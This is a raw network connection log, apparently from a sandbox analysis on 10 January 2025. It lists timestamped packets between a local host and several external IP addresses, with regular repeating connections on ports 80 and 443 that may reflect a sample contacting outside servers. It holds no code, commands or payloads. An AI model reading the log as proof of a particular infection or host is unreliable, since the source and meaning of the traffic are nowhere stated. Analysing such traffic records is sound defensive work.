                                                                                                          Jan 10, 2025 22:14:14.856708050 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:14.859436035 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:14.859925032 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:14.903321981 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.360663891 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.360764027 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.366533041 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.366605997 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.379045963 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.379126072 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.379136086 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.379182100 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.385421991 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.385512114 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.447252989 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.447355986 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.447391033 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.447452068 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.447480917 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.447532892 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.450107098 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.450165987 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.450193882 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.450242996 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.456161976 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.456233025 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.456249952 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.456301928 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.462304115 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.462372065 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.462400913 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.462450981 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.468744040 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.468813896 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.468832016 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.468883038 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.476449013 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.476521015 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.476533890 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.476581097 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.483935118 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.484004021 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.484050989 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.484102964 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.487488031 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.487549067 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.487574100 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.487623930 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.493411064 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.493640900 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.493649960 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.493772030 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.499094963 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.499170065 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.499187946 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.499237061 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.505008936 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.505079985 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.505095959 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.505145073 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.510981083 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.511075974 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.517076015 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.517144918 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.517163038 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.517211914 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.534101009 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.534271955 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.534363031 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.534450054 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.534471035 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.534471035 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.534482956 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.534496069 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.534508944 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.534528017 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.535820961 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.535927057 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.536370039 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.536428928 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.541631937 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.541697025 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.541698933 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.541712999 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.541743040 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.541784048 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.546958923 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.547027111 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.547035933 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.547077894 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.552484989 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.552546978 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.552576065 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.552628040 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.557460070 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.557524920 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.557542086 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.557594061 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.562644005 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.562716007 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.562730074 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.562784910 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.568722010 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.568794966 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.568814039 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.568861008 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.571742058 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.571799994 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.571832895 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.571942091 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.576325893 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.576389074 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.576400995 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.576471090 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.581017971 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.581120014 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.581127882 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.581204891 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.585586071 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.585702896 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.585711956 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.585762024 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.590281963 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.590363026 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.590373039 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.590415001 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.594643116 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.594706059 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.594717979 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.594765902 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.598902941 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.598944902 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.598994970 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.599004030 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.599045992 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.599066019 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.599126101 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:17.599138021 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.599186897 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.599224091 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:17.599240065 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:18.040087938 CET4997280192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:18.044917107 CET8049972132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:18.044990063 CET4997280192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:18.045551062 CET4997280192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:18.050359011 CET8049972132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:19.132848024 CET8049972132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:19.142781973 CET4997280192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:19.147602081 CET8049972132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:19.438960075 CET8049972132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:19.480720043 CET4997280192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:19.733951092 CET49973443192.168.2.7104.21.32.1
                                                                                                          Jan 10, 2025 22:14:19.733963013 CET44349973104.21.32.1192.168.2.7
                                                                                                          Jan 10, 2025 22:14:19.734038115 CET49973443192.168.2.7104.21.32.1
                                                                                                          Jan 10, 2025 22:14:19.736207962 CET49973443192.168.2.7104.21.32.1
                                                                                                          Jan 10, 2025 22:14:19.736219883 CET44349973104.21.32.1192.168.2.7
                                                                                                          Jan 10, 2025 22:14:20.195122957 CET44349973104.21.32.1192.168.2.7
                                                                                                          Jan 10, 2025 22:14:20.195336103 CET49973443192.168.2.7104.21.32.1
                                                                                                          Jan 10, 2025 22:14:20.204762936 CET49973443192.168.2.7104.21.32.1
                                                                                                          Jan 10, 2025 22:14:20.204773903 CET44349973104.21.32.1192.168.2.7
                                                                                                          Jan 10, 2025 22:14:20.205097914 CET44349973104.21.32.1192.168.2.7
                                                                                                          Jan 10, 2025 22:14:20.247010946 CET49973443192.168.2.7104.21.32.1
                                                                                                          Jan 10, 2025 22:14:20.360112906 CET49973443192.168.2.7104.21.32.1
                                                                                                          Jan 10, 2025 22:14:20.403340101 CET44349973104.21.32.1192.168.2.7
                                                                                                          Jan 10, 2025 22:14:20.476053953 CET44349973104.21.32.1192.168.2.7
                                                                                                          Jan 10, 2025 22:14:20.476125956 CET44349973104.21.32.1192.168.2.7
                                                                                                          Jan 10, 2025 22:14:20.476250887 CET49973443192.168.2.7104.21.32.1
                                                                                                          Jan 10, 2025 22:14:20.493288994 CET49973443192.168.2.7104.21.32.1
                                                                                                          Jan 10, 2025 22:14:25.953408003 CET4997280192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:25.958338976 CET8049972132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:26.246644974 CET8049972132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:26.257728100 CET49974443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:26.257781029 CET44349974149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:26.257884026 CET49974443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:26.258294106 CET49974443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:26.258311033 CET44349974149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:26.293284893 CET4997280192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:26.895637035 CET44349974149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:26.895798922 CET49974443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:26.897577047 CET49974443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:26.897587061 CET44349974149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:26.897849083 CET44349974149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:26.899295092 CET49974443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:26.939322948 CET44349974149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:26.939369917 CET49974443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:26.939380884 CET44349974149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:27.330651999 CET44349974149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:27.330730915 CET44349974149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:27.330785036 CET49974443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:27.331216097 CET49974443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:27.480464935 CET4997280192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:27.481574059 CET4997580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:27.485546112 CET8049972132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:27.485618114 CET4997280192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:27.486378908 CET8049975132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:27.486450911 CET4997580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:27.486536026 CET4997580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:27.491334915 CET8049975132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:28.979832888 CET8049975132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:29.027759075 CET4997580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:29.033828974 CET49976443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:29.033884048 CET44349976149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:29.033961058 CET49976443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:29.034483910 CET49976443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:29.034497976 CET44349976149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:29.641664028 CET44349976149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:29.644922018 CET49976443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:29.644942999 CET44349976149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:29.644994974 CET49976443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:29.645000935 CET44349976149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:29.966046095 CET44349976149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:29.966156960 CET44349976149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:29.966206074 CET49976443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:29.966559887 CET49976443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:29.971235991 CET4997780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:29.978658915 CET8049977132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:29.978816032 CET4997780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:29.978892088 CET4997780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:29.986742973 CET8049977132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:30.886034012 CET8049977132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:30.887440920 CET49978443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:30.887497902 CET44349978149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:30.887567043 CET49978443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:30.887950897 CET49978443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:30.887964964 CET44349978149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:30.933897018 CET4997780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:31.523397923 CET44349978149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:31.526587009 CET49978443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:31.526622057 CET44349978149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:31.526683092 CET49978443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:31.526691914 CET44349978149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:31.991010904 CET44349978149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:31.991226912 CET44349978149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:31.991297960 CET49978443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:31.991657972 CET49978443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:32.005933046 CET4997780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:32.010492086 CET4997980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:32.010979891 CET8049977132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:32.011063099 CET4997780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:32.015346050 CET8049979132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:32.015575886 CET4997980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:32.015575886 CET4997980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:32.020442963 CET8049979132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:32.872109890 CET8049979132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:32.873481035 CET49980443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:32.873591900 CET44349980149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:32.873745918 CET49980443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:32.874135017 CET49980443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:32.874172926 CET44349980149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:32.918275118 CET4997980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:33.516954899 CET44349980149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:33.518846035 CET49980443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:33.518877029 CET44349980149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:33.518951893 CET49980443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:33.518960953 CET44349980149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:34.010163069 CET44349980149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:34.010251045 CET44349980149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:34.010319948 CET49980443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:34.010837078 CET49980443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:34.014030933 CET4997980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:34.015160084 CET4998180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:34.019001007 CET8049979132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:34.019073009 CET4997980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:34.020020962 CET8049981132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:34.020086050 CET4998180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:34.020164013 CET4998180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:34.024981976 CET8049981132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:34.988560915 CET8049981132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:34.989685059 CET49982443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:34.989799976 CET44349982149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:34.989917994 CET49982443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:34.990145922 CET49982443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:34.990184069 CET44349982149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:35.043298960 CET4998180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:35.615792990 CET44349982149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:35.617614985 CET49982443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:35.617686987 CET44349982149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:35.617786884 CET49982443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:35.617804050 CET44349982149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:36.003089905 CET44349982149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:36.003182888 CET44349982149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:36.003302097 CET49982443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:36.003849030 CET49982443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:36.007422924 CET4998180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:36.008819103 CET4998380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:36.012394905 CET8049981132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:36.012473106 CET4998180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:36.013684988 CET8049983132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:36.013758898 CET4998380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:36.013865948 CET4998380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:36.018599987 CET8049983132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:36.889926910 CET8049983132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:36.891561031 CET49984443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:36.891602993 CET44349984149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:36.891696930 CET49984443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:36.891964912 CET49984443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:36.891974926 CET44349984149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:36.933917999 CET4998380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:37.524553061 CET44349984149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:37.526200056 CET49984443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:37.526222944 CET44349984149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:37.526292086 CET49984443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:37.526299000 CET44349984149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:37.923801899 CET44349984149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:37.923943996 CET44349984149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:37.924016953 CET49984443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:37.924417973 CET49984443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:37.927637100 CET4998380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:37.928808928 CET4998580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:37.932657957 CET8049983132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:37.932724953 CET4998380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:37.933634996 CET8049985132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:37.933705091 CET4998580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:37.933798075 CET4998580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:37.938550949 CET8049985132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:39.060758114 CET8049985132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:39.062355995 CET49986443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:39.062417030 CET44349986149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:39.062517881 CET49986443192.168.2.7149.154.167.220
